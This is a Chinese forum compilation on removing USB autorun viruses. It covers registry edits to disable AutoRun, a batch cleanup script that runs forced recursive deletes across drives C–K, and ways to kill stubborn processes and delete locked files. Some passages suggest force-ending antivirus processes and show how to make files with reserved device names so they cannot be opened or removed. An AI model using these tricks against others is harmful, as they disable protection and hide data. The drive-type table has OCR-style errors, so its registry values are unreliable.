DKIVE_UNKNOWN 0101h不能识别的设备类型
DRIVE_NO_ROOT_DIR 1002h 没有根目录的驱动器(Drive without root directory)
DRIVE_REMOVABLE 2104h可移动驱动器(Removable drive)
DRIVE_FIXED 3008h 固定的驱动器(Fixed drive)
DRIVE_REMOTE 4110h网络驱动器(Network drive)
DRIVE_CDROM 5020h光驱(CD-ROM)
DRIVE_RAMDISK 6040h RAM磁盘(RAM Disk) 保留7180h未指定的驱动器类型(Not yet spec
ified drive disk)

在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行(默认情况下
，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是16进制的95h，
所以NoDriveTypeAutoRun”默认键值为95，00，00，0 0)。

由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、D
RIVE_FIXED、DRIVE_CDROM：、DRIVE_RAMDISK这4个保留设备，所以要禁止硬盘自动运行A
utoRun．inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱
动器，即硬盘。这样一来，原来的1 00101 01(在表中“值”列中由下向上看)就变成了二
进制的10011101，转为16进制为9D。现在，将“No Drive Type AutoRun”的键值改为9D，
00，00，00，关闭注册表编辑器，重启电脑就会关闭硬盘的AutoRun功能。

怎样禁止光盘AutoRun功能?其实就是将DRIVE_CDROM设为1，这样“No Drive TypeAut
oRun”键值中的第一个值就变成了10110101，也就是16进制的B5。将第一个值改为B5后关
闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁』卜软件光盘的
AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“No Drive Type AutoR
un”的键值改为：BD，00，00，00即可。如果想要恢复硬盘或光驱的AutoRun功能，进行反
：方向操作即可。

事实上，大多数的硬盘根H录下并不需要AutoRun．inf文件来运行程序，因此，我们完
全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun．inf这个文件，W
indows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的
目的。
[/quote]
[quote]双击打不开盘符，在各盘盘符下有一个autorun.inf文件，
sxs.exe,rose.exe还有iexplores.exe等多种病毒都是这症状.

解决步骤：
1：先显示所有文件，打开"我的电脑"，然后依次点击"工具"－"文件夹选项"－"查看"，
把"隐藏已知文件类型的扩展名"前的小勾取消.然后看有没有隐藏的EXE文件，
如果还是没看到，可能病毒改了注册表，恢复后应该就可以看到了，

恢复代码如下：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001

把上面的代码另存为XXX.reg,然后双击导入注册表，

2.比如查到的隐藏exe文件名是sxs.exe，为SXS病毒
下面一段代码用记事本保存，后缀名改为cmd，然后直接双击运行.
其他这类病毒都可以作类似处理，把相应病毒进程名和病毒名替换掉就行。
(iexplores.exe病毒对应的系统进程有mapserver.exe，mainsv.exe，ptsnopt.exe，在系统目录下)。

这一段代码是别人做的，不清楚出自哪里，会点dos的人应该能看懂。

@echo 清理病毒中......

@echo off
cd\
taskkill /f /im SVOHOST.exe
taskkill /f /im sxs.exe
cd\
attrib C:\WINDOWS\system32\SVOHOST.exe -a -h -s
del SVOHOST.exe/s /q /f

attrib C:\WINDOWS\system32\winscok.dll -a -h -s
del winscok.dll /s /q /f
c:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

D:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

E:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

F:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

G:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

H:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

I:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

J:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

K:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

C:
echo Windows Registry Editor Version 5.00>>9697.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]>>9697.reg
echo "CheckedValue"=dword:00000001>>9697.reg
echo Windows Registry Editor Version 5.00>>9697.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>9697.reg
echo "NoDriveTypeAutoRun"=hex:95,00,00,00>>9697.reg
regedit /s 9697.reg
del 9697.reg
cls
@echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@echo   这是个盗QQ的木马能感染所有的硬盘和
@echo   移动存储器！病毒已经清理啦！在运行
@echo   里启动msconfig把SVOHOST的启动项去掉
@echo   最好再从新启动电脑再运行本工具一次！
@echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@echo   
@echo   
@echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pause

=========================================================
3.启动msconfig把病毒的启动项去掉,启动资注册表编辑器regedit，
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\MountPoints\X\Shell\command\下的键值,把shell子键删除即可。（X为盘符）
4.如果病毒进程无法结束------杀死计算机病毒进程
[quote]大家都知道很多病毒或者流氓软件很难杀，原因之一就是，没有结束掉病毒进程！很多时候是怎么也结束不掉。下文会为大家解决这种困扰！

1.在任务管理器里结束，按下ctrl+del+alt
2.通过WinXP系统下的taskkill命令来实现的，
在使用该方法之前，首先需要打开系统的进程列表界面，找到病毒进程所对应的具体进程名。
接着依次单击“开始→运行”命令，在弹出的系统运行框中，运行“cmd”命令；再在DOS命令行中输入“taskkill /im aaa”格式的字符串命令，单击回车键后，顽固的病毒进程“aaa”就被强行杀死了。比方说，要强行杀死“conime.exe”病毒进程，只要在命令提示符下执行“taskkill /im conime.exe”命令，要不了多久，系统就会自动返回结果。
3.使用进程执法官，process explorer，procx，

上面的方法，只对部分病毒进程有效，遇到一些更“顽固”的病毒进程，可能就无济于事了。
此时还有以下几种方法，可结束系统进程比如，结束后会蓝屏，只能重起了，有兴趣可以试一下，对系统到没什么危害。
4.Win2000以上系统的内置命令——ntsd.
在使用该命令杀死病毒进程之前，需要先查找到对应病毒进程的具体进程号。
首先打开系统任务管理器窗口，再单击“查看”菜单项下面的“选择列”命令，在弹出的设置框中，
将“PID（进程标志符）”选项选中，单击“确定”按钮。返回到系统进程列表页面中后，
你就能查看到对应病毒进程的具体PID了。接着运行“cmd”命令，在命令提示符状态下输入“ntsd -c q -p PID”命令，
就可以强行将指定PID的病毒进程杀死了。例如，发现某个病毒进程的PID为“444”，
那么可以执行“ntsd -c q -p 444”命令，来杀死这个病毒进程。
其实很多进程管理类软件调用的就是这个,大家注意这类软件运行的时候进程里多了个ntsd的.

还有更强的,就是下面这两个:大家可以试试结束一些杀毒软件的进程.
5.使用icesword或者WINDOWS杀毒助手[/quote]
如果病毒无法删除-------如何删除顽固文件
[quote]大家是否遇到删除文件的时候会提示“文件正在被使用”，或者提示删除了，但是一刷新，它又在那里了。
而有一些文件根本就看不见，无论是通过资源管理器还是其它方式都看不到，更就没有办法删除了。
下面我们就来探讨一下这个问题。
  在windows下，一个正常共享打开或被使用的文件，是不能被删除的。当删除的时候，
会提示“无法删除，文件正在被使用”。常见的就是流氓软件的各种.dll或者.exe进程或者.sys驱动文件。
所以删除文件之前，需要解除使用这个文件的句柄或者加载它的.exe进程。

一、常规方法
只是很简单的介绍一下，只是利用系统自带的功能。高手可以跳过。
1.结束进程再删除。删除文件时如果系统提示“文件正在使用”，首先检查一下是否没有退出与被删文件相关的程序，再看看系统进程中是否还有相关进程保留。
2.重启后或换个系统再删除。使用多系统的朋友可以切换到另外一个系统中执行删除操作，这招比较有效。
3.结束掉Explorer进程后再删除。按下Ctrl+Alt+Del键打开任务管理器，切换到“进程”选项卡，结束掉Explorer进程，这时候桌面会丢失，不用着急，运行“文件→新任务”，输入“cmd”后回车打开命令行窗口，进入待删文件所在目 录，用RD或delete命令删除即可。删除完毕后再次运行“文件→新任务”命令，输入“explorer”后回车，桌面又回来了.
4.关闭预览功能再删除。如果你在资源管理器中使用了视频、图片的预览功能，那么在删除此类文件时常常不成功，解决的办法是关闭该功能：Windows XP用户在“开始→运行”中输入“regsvr32 /u shmedia.dll”即可，Windows 2000用户则在资源管理器中的空白处单击鼠标右键，选择“自定义文件夹”选项，会出现自定义文件夹向导，进入到“请选择模板”窗口后，选择其中的“简易”便可以禁止视频预览了。
5.Windows XP附带的Msicuu.exe、Msizap.exe来彻底卸载顽固程序
　　首先要打开Windows XP安装盘，点“Support Tools”，进入硬盘的Support Tools安装目录(X:Program FilesSupport Tools)，找到Msicuu.exe并双击，于是就会弹出一个“Windows Installer Clean Up”窗口，显示当前已安装的所有程序列表。你从中选择顽固程序，然后单击“Rmove”按钮即可卸载。如果以上方法无效，建议你用Msizap.exe来卸载，方法是:打开注册表编辑器，定位到HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall，在左边项中找到顽固程序的标识(例如)，然后依次选择“开始→程序→Windows Support Tools→Command Prompt”命令，在命令提示符后，输入以下命令:msizap T ，按回车后即可卸载顽固程序。
6.Windows XP的命令Replace.exe的主要功能，就是替换文件。该命令在Windows安装目录的System32文件夹下，
它能够替换正在使用中的文件！
　　例如，我们用Windows Media Player播放一首路径为“g:mp3source.mp3”的歌曲
，然后在命令提示符窗口下键入下列命令：
　　replace.exe d:mp3source.mp3 g:mp3
　　这里的“d:mp3source.mp3”是准备用来替换的另一首MP3歌曲，注意两个
文件的文件名必须保持一致，很快我们就会在看到替换成功的提示，接下来Windows Medi
a Player窗口正在播放的歌曲也会自动变为另一首歌曲，呵呵，够神奇的吧？当然，repl
ace命令的最大好处是用来替换系统文件，这样就不需要重新启动到安全模式下了！
　　Replace.exe命令的使用参数如下，有兴趣的朋友可以深入研究一下：
　　/A——把新文件加入目标目录，注意不能与/S或/U搭配使用。
　　/P——替换文件或加入源文件之前提醒用户进行确认。
　　/R——替换只读文件以及未受保护的文件。
　　/S——替换目标目录中所有子目录中的文件。
　　/W——等待用户插入磁盘后再运行。
　　/U——只替换或更新比源文件日期早的文件，不能与/A搭配使用。


二、其它常用软件来删除
  请常用软件“兼职”删除。我们可以使用FlashFXP、Nero、ACDSee、Winrar、qq,Winamp来删除顽固文件，这种方法往往有奇效。
1，FlashFXP、Nero、ACDSee只需在本地目录中浏览到待删文件，对其执行删除操作即可.
2，使用Winrar来删除文件的方法步骤如下：右键单击待删除文件或者文件夹，选择“添加到档案文件”菜单，
在谈出窗口中勾选“存档后删除源文件”，单击“确定”，这样Winrar在创建压缩文件的同时，也会帮我们删除顽固的文件，
我们只需要将创建的压缩文件删除即可.
3，将QQ安装目录下的unins000.exe文件拷贝到要卸载文件的安装目录，再执行该程序即可!这种办法对于卸载那些反安装程序丢失或者损坏的文件有特效。
4,首先在“我的电脑”找到Winamp安装目录下的UninstWp.exe程序，复制并粘贴到顽固程序所在的文件夹中，双击运行该程序就可以把顽固程序卸载得干干净净了。


三、使用专业删除软件。
1，冰刃icesword
现在很多流氓软件都是通过内核来加载，象CNNIC中文上网的cdnprot.sys,3721的CnsMinKP.sys，它加载后，为了保证软件不被删除，就监视所有的文件、注册表删除操作，如果发现是删除这些文件，就直接返回一个true,这样Windows以为已经删除了，但是文件还在那里。再有一些做得更绝，它会把文件隐藏起来。这个隐藏是基于内核级的，不是通过打开资源管理器里面的“显示隐藏文件”选项就能看到的。象TotalCommand有时也发现不了。针对这些文件，Unlocker也是无药可施的。即使是Windows提供的重启删除机制，也被这些流氓软件给破了。IceSword是这类软件中最有效的，能删除各种驱动保护文件，而不需要重启操作系统或者装一个DOS之类多操作系统来完成。
  使用很简单，通过它的“文件”，然后象资源管理器一样，找到相应的文件，然后点右键——删除便可。如果是.exe的文件本身在运行，要先通过IceSword的进程管理器来杀掉，然后再删除。
冰刀是重建系统核心，可以绕过所有的NTFS安全以及其它保护。
但前不久有人写出的专门来欺骗冰刀的文章已经有人应用了。


2，金山文件粉碎器(金山反间谍2007)。
  大多数情况下，Windows自带的文件删除并不彻底，文件被删除后，他人仍然可以通过一些磁盘工具进行恢复。
所以对于一些想彻底删除的文件，可以使用文件粉碎器进行彻底删除。新版本的文件粉碎器采用了基于磁盘物理扇区的粉碎机制，
能够彻底清除文件内容、文件名以及分配表等所有文件信息，保证了被粉碎文件无法恢复。
同时符合美国国防部标准中对机密文件的粉碎处理方式。
  试验表明，它独有的方式正好可以突破目前所有的流氓软件的自我保护功能。经试验，Windows系统下的所有文件，
无论是正在运行的程序，正在被使用的DLL，正在被打开的文件，还是采取自我保护的驱动，全部都可以被轻易地删除！
试验过程：在机上上同时安装了CNNIC，彩信通，SPOOLSV、百狗（Baigoo）、3721，百度等多个流氓软件，
然后在不关闭任何进程以及使用任何工具的情况下，把所有流氓软件相关的目录、驱动文件、可执行文件，
通过文件粉碎器，一次性全部删除！
  文件粉碎器是直接写磁盘的文件空间，把文件内容改写，所以还是需要通过NTFS的权限检查的，
所以在普通帐户下删除管理员帐户的文件可能会失败。


3，PC Tools
可以删除几乎所有“顽固”软件。运行软件后，先按任意键进入软件的主界面，然后按下F10 切换选中待删文件，按下D键并确认操作即可删除.

4.unlocker,killbox,CopyLock
unlocker是一个非常优秀、小巧，功能强大的文件删除工具。大部分正常情况下都可以把.dll, exe等文件删除掉。
它可以关掉使用文件的句柄(正常文件），杀掉进程(.dll)，Unload DLL。安装完了之后，以后要使用的时候，
在需要删除的文件或者目录上点右键，在菜单中选择“Unlocker”。这时如果它检测到文件/目录被其它进程锁了，
就会有一个列表的窗口出来，显示当前锁定或使用这个文件/目录的进程。那个Action动作选择“删除”，
再点一下那个“Unlock All”就可以了。 如果这个文件被一些核心进程占用或者保护，它会提示要等下一次启动的时候再删除，
这时点确定就可以了。大多数情况下，是不需要重启的。
killbox,unlocker里面的文件删除用了很多办法，最后一招是利用系统的“延迟删除功能”。
但是现在有不少流氓软件已经针对此做了防范，只要过滤相关的注册表值就可以了。所以对于有一些文件，它们都删除不掉。


四、安全模式或DOS或PE或光盘版xp(非PE)
其实熟悉DOS或者有能光盘启动的工具盘的话，一切都很简单。
1，一般情况下，在安全模式下能删除。
2，在DOS下删使用RD(删除目录)或delete命令(删除文件)
3，用PE系统光盘启动删除。
4，类推的，其他系统都可以删除，比如linux等等，不一一列举。

五、利用WINDOWS命名漏洞建立的文件或文件夹
  对利用WINDOWS命名漏洞命名的文件, 利用Windows以设备命名文件夹拒绝服务漏洞的文件，在“开始”→“运行”中输入cmd后回车，使用dos命令删除。 这个把怎么建立的过程也讲一下：
1，利用Windows以设备命名文件夹拒绝服务漏洞
例如新建以下这些名字的文件（或文件夹）：aux、com1、com2、prn、con、nul，系统会提示无法建立。
我们可以在命令行窗口中建立，然后将文件copy进去，这样，文件打不开也删不掉。
实现过程：在“开始”→“运行”中输入cmd后回车，进入命令行窗口，假设你所要加密的文件在C盘根目录下，名字为111.txt，只要输入copy c:I.txt \.c:com1.txt（小提示：也可以命名为aux、com2、prn、con、nul其中的任意一个文件名）。这样你的111.txt文件中的内容就会被复制到com1.txt文件中了，com1.txt含有Windows禁用的文件名，故无法打开
也无法删除，别人就拿它没办法了，你要是再想查看其中的内容可以在“开始”→“运行”中输入\.c:com1.txt即可，删除它也很简单，在命令行中输入del \.c:com1.txt。   
2，利用WINDOWS命名漏洞命名的文件, 比如xxx.，即文件最后有一个点.
  这样的文件夹是无法直接建立的，不信试一下，后面的那个点是自动消失的。
  建立这个文件的话可以用 md xxx..\n   也可以新建一个xxx，然后用WINRAR改xxx为xxx..\n   删除的话用       rd /s /q xxx..
  没用的话再输入     del /f /q xxx..\n
--------------------------------------------------------------------------
对于含有保留字的文件，当我们发出删除指令的时候，Windows会检查被删除的文件是否有合法的路径，如果你的文件名含有Windows认为的非法字符或保留字，那么删除就会失败。
我们有3种方法可以删除这类文件：
a)采用Linux或其他非Windows的操作系统，以Linux/Unix为例：可以使用rm命令删除：
rm -d //driveletter/path using forward slashes/filename
rm -r "//C/Program Files/BadFolder"
b)使用命令行工具的一个特殊参数解决：
RD.:
DEL.driveletter:path ilename
在删除命令后面跟上.参数就可以避免Windows检查文件名的合法性，因此可以删除含有Windows保留字或非法名字的文件。
c)对于文件，如果可以使用通配符，那么也可以采用通配符解决：
DEL DEL PR?.*
DEL LPT?.*
--------------------------------------
以下转贴：
不进安全模式，不借第三方工具，删除正在使用的文件两招。
（仅适用于 Windows NT/2000/XP/2003）
　　相信大家一定碰到过因为文件正在使用而无法删除的问题吧，现在教大家两招，仅用系统自身的功能就可以搞定。思路其实非常简单，就是让正在使用的文件变成不是正在使用就可以了。现在来解决这个问题：
第一招 磁盘扫描
　　看到这个题目大家不要郁闷，磁盘扫描是如何能做到的呢，其实磁盘扫描 CHKDSK 有一个参数 /X ，作用是强制关闭指定磁盘打开文件的句柄。正是利用这个来解决问题。
假设 E: 有个文件正在使用，无法删除。
第一步：关闭 E: 上已知正在运行的程序或文件。毕竟能用正常方法关闭的文件就用正常方法关闭。
第二步：运行 CMD 打开“命令提示符”窗口，输入 CHKDSK E: /X 。如没有意外，系统会显示 E: 已被强制卸下，所有打开的句柄都将无效，这说明 E: 上所有打开的文件已被强制关闭，待磁盘扫描完毕后就可以去删除你要删除的文件了。:)
特别说明：
　　此方法不适用于 Windows 所在的系统磁盘以及虚拟内存所在磁盘。例如你 Windows 装在 C: ，那么 C: 是无法被强制卸下的。如果虚拟内存放在 D: ，那么 D: 也不能够被强制卸下。
第二招 利用 NTFS 安全设置
　　要用这个方法必须保证磁盘为 NTFS 文件系统才行。
　　首先，找到正在使用而无法删除的文件，打开其“属性”，选择“安全”选项卡（XP 要在“文件夹选项”里面取消“使用简单的文件共享”才显示该项。），单击“高级”按钮，打开高级选项页，取消从父文件夹继承权限的选项。访问者列表里面除了自己的登陆账号以外其它的统统删除，之后点击“编辑”按钮编辑你自己的访问权限，只勾选“删除”的权限，其它诸如“读取”“执行”的权限等等全部取消或拒绝，确定后重新启动计算机。计算机重新启动后任何用户都无权读取该文件，该文件自然不会变成“正在使用的文件”。而你自己的账号有删除的权限，则可以轻松删除该文件了。
以上为本人的一点经验，希望对解决部分顽固病毒，以及不方便进 DOS 或不熟悉 DOS 的用户有所帮助。
[/quote]
[/quote]

经常使用U盘的朋友可能已经多次遭遇到了U盘病毒，U盘病毒是一种新病毒主要通过U盘、移动硬盘传播。目前几乎所有这类的病毒的最大特征都是利用autorun.inf这个来侵入的，而事实上autorun.inf相当于一个传染途径，经过这个途径入侵的病毒，理论上是“任何”病毒。因此大家可以在网上发现，当搜索到autorun.inf之后，附带的病毒往往有不同的名称，正是这个道理。就好像身体上有个创口，有可能进入的细菌就不止一种，在不同环境下进入的细菌可以不同，甚至可能是AIDS病毒。这个autorun.inf就是创口。因此目前无法单纯说U盘病毒就是什么病毒，也因此导致在查杀上会存在混乱，因为U盘病毒不止一种或几十种，详细的数字应该没人去统计吧。
　　现在先说说autorun.inf这个所谓的创口吧……
　　首先，autorun.inf这个文件是很早就存在的，在WinXP以前的其他windows系统（如Win98，2000等），需要让光盘、U盘插入到机器自动运行的话，就要靠autorun.inf。这个文件是保存在驱动器的根目录下的（是一个隐藏的系统文件），它保存着一些简单的命令，告诉系统这个新插入的光盘或硬件应该自动启动什么程序，也可以告诉系统让系统将它的盘符图标改成某个路径下的icon。所以，这本身是一个常规且合理的文件和技术。
　　但相信你已经注意到，上面反复提到“自动”，这就是关键。病毒作者可以利用这一点，让移动设备在用户系统完全不知情的情况下，“自动”执行任何命令或应用程序。因此，通过这个autorun.inf文件，可以放置正常的启动程序，如我们经常使用的各种教学光盘，一插入电脑就自动安装或自动演示；也可以通过此种方式，放置任何可能的恶意内容。
　　这里再说说计算机病毒：跟生物界的状况是一样的，细菌、病毒跟人类都是生物体，甚至在大部分情况下，这些微生物也并非完全有害，也会与人体共存。电脑中的病毒跟正常程序一样，都是使用基础原理一致的源代码编写、执行的，只是软件执行的是用户需要的、正常的功能，病毒执行的是用户不需要的、不正常的功能，这里有一个辩证的相对性在里面。简单的例子，比如稍微熟悉电脑的朋友都知道Format、del的DOS命令代表格式化硬盘和删除文件，假设我autorun.inf中使用了Format或del命令，那么表示我可以让别人的机器被格式化，或者删除了一些文件，而这其实不需要太高深的电脑知识。
　　说完autorun.inf，再说说目前相关的U盘病毒的隐藏方式：
　　有了启动方法，病毒作者肯定需要将病毒主体放进光盘或者U盘里才能让其运行的，但是堂而皇之的放在U盘里肯定会被用户发现而删除（即使不知道其是病毒，不是自己的不知名文件也会删除吧），所以，病毒肯定会隐藏起来存放在一般情况下看不到的地方了。一种是假回收站方式：病毒通常在U盘中建立一个“RECYCLER”的文件夹，然后把病毒藏在里面很深的目录中，一般人以为这就是回收站了，而事实上，回收站的名称是“Recycled”，而且两者的图标是不同的：

另一种是假冒杀毒软件方式：病毒在U盘中放置一个程序，改名“RavMonE.exe”，这很容易让人以为是瑞星的程序，其实是病毒。
　　也许有人会问，为什么在你的机器上能看到上面的文件，我的机器看不到呢？很简单，通常的系统安装，默认是会隐藏一些文件夹和文件的，病毒就会将自己改造成系统文件夹、隐藏文件等等，一般情况下当然就看不到了。要让自己能看到隐藏的文件，怎么办？个人如操作，按如下步骤：打开“我的电脑”，在菜单栏上点“工具”，点“文件夹选项”，出现一个对话框，选择“查看”标签，然后对照下图：

如果U盘带有上述病毒，还会一个现象，当你点击U盘时，会多了一些东西：

上图左侧是带病毒的U盘，右键菜单多了“自动播放”、“Open”、“Browser”等项目；右侧是杀毒后的，没有这些项目。这里注明一下：凡是带Autorun.inf的移动媒体，包括光盘，右键都会出现“自动播放”的菜单，这是正常的功能。　
　　综上所述：
　　引用
　　目前的U盘病毒都是通过Autorun.inf来进入的；
　　Autorun.inf本身是正常的文件，但可被利用作其他恶意的操作；
　　不同的人可通过Autorun.inf放置不同的病毒，因此无法简单说是什么病毒，可以是一切病毒、木马、黑客程序等；
　　一般情况下，U盘不应该有Autorun.inf文件；
　　如果发现U盘有Autorun.inf，且不是你自己创建生成的，请删除它，并且尽快查毒；
　　如果有貌似回收站、瑞星文件等文件，而你又能通过对比硬盘上的回收站名称、正版的瑞星名称，同时确认该内容不是你创建生成的，请删除它；
　　同时，一般建议插入U盘时，不要双击U盘，另外有一个更好的技巧：插入U盘前，按住Shift键，然后插入U盘，建议按键的时间长一点。插入后，用右键点击U盘，选择“资源管理器”来打开U盘。
　　注：部分U盘制造商可能也会利用Autorun.inf进行自己的特色设计，目的是为了让用户执行厂商的特色程序。已确认部分厂商确实使用了这种方式，因此建议购买U盘是先做识别，或咨询销售人员。
　　下面说说RavMon.exe病毒的解决办法吧：
　　昨天某人发现她的U盘有病毒，KV报出一个RavMonE.exe文件，这个也是最经典的一个U盘病毒了……
　　引用
　　RavmonE.exe病毒运行后，会出现同名的一个进程，该程序并貌似没有显著危害性。程序大小为3.5M，貌似用Python写的，一般会占用19-20M左右资源，在Windows目录内隐藏为系统文件，且自动添加到系统启动项内。其生成的Log文件常含有不同的六位数字，估计可能在有窃取帐号密码之类的危害吧，不过由于该疑似病毒文件过于巨大，一般随移动存储器传播。
　　解决方法：
　　1、打开任务管理器（ctrl+alt+del或者任务栏右键点击也可），终止所有ravmone.exe的进程。
　　2、进入c：\windows，删除其中的ravmone.exe。
　　3、进入c：\windows，运行regedit.exe，在左边依次点开HK_Loacal_Machine\software\Microsoft\windows\CurrentVersion\Run\，在右边可以看到一项数值是c：\windows\ravmone.exe的，把他删除掉。
　　4、完成后，病毒就被清除了。
　　[color=orangered][b]杀掉U盘中的病毒的方法：
　　对移动存储设备，如果中毒，则把文件夹选项中隐藏受保护的操作系统文件钩掉，点上显示所有文件和文件夹，点击确定，然后在移动存储设备中会看到如下几个文件，autorun.inf，msvcr71.dl，ravmone.exe，都删除掉，还有一个后缀为tmp的文件，也可以删除，完成后，病毒就清除了。
　　但对于上面的处理U盘中的病毒的方法，经过我的亲身经历后作小小补充：就是在删除autorun.inf，msvcr71.dl，RavMonE.exe这三个文件时，直接删可能会删不掉的，要先到进程管理那了先结束RavMonE.exe再删除这三个文件，如果还不行就到安全模式里删，这样就一定行。[/b][/color]
　　小结：
　　不要以为这个是小小的病毒，它是不知不觉的在后台运行的，它长期会占用你差不多20M内存，它随系统启动。它会莫名奇妙的使你的计算机在沉默中死亡。相信这病毒在公共的计算机中非常流行，例如学校，公司等。这个病毒任你格式化U盘也格不掉，用很多杀毒软件也奈它不何。一般让你看不出来，不信你可以把U盘插入电脑中再把“文件夹选项中隐藏受保护的操作系统文件钩掉”，看看……你可能见到多出了三个不明的文件，那你就是中招了！有空检查一下你的U盘吧！祝你好运！注意：如果进程是Ravmon.exe ，这个应该是瑞星的程序而不病毒！